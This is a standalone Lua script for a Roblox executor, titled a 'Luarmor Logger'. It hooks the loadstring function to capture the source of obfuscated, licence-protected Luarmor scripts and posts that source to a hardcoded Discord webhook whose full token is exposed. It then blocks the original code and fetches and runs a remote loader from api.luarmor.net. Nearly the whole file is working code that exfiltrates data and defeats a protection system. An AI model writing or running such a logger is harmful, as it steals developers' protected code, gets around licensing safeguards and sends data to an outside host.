-- Full Standalone Luarmor Logger
-- No external links - everything inside

local WEBHOOK_URL = "https://discord.com/api/webhooks/1476630457742397490/vQDcitwKowVwTn8ZcwXjuTGVomZuM4oAAo3IrbGaZR60NNIR6iliWYpwjMRMI-LYA4P8"

local function send_to_webhook(content, filename)
    local boundary = "----Boundary" .. os.time()
    local head = "--" .. boundary .. "\r\n" ..
                 "Content-Disposition: form-data; name=\"file\"; filename=\"" .. filename .. "\"\r\n" ..
                 "Content-Type: text/plain\r\n\r\n"
    local foot = "\r\n--" .. boundary .. "--\r\n"

    pcall(function()
        request({
            Url = WEBHOOK_URL,
            Method = "POST",
            Headers = { ["Content-Type"] = "multipart/form-data; boundary=" .. boundary },
            Body = head .. content .. foot
        })
    end)
end

print("Logger started - Capturing Luarmor script...")

local old_loadstring = hookfunction(loadstring, function(src)
    if type(src) == "string" and #src > 200 then
        warn("[+] Captured obfuscated script! Sending to webhook...")
        
        task.spawn(function()
            send_to_webhook(src, "Luarmor_Captured.lua")
            send_to_webhook("Length: " .. #src .. " characters\nCaptured at: " .. os.date("%Y-%m-%d %H:%M:%S"), "Info.txt")
        end)
        
        return function() end -- block original execution
    end
    return old_loadstring(src)
end)

-- === FULL LUARMOR SCRIPT (hardcoded) ===
local luarmor_code = [==[
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/1fccd71cc422620f1d624df9a21d33aa.lua"))()
]==]

print("Executing captured Luarmor script...")
loadstring(luarmor_code)()
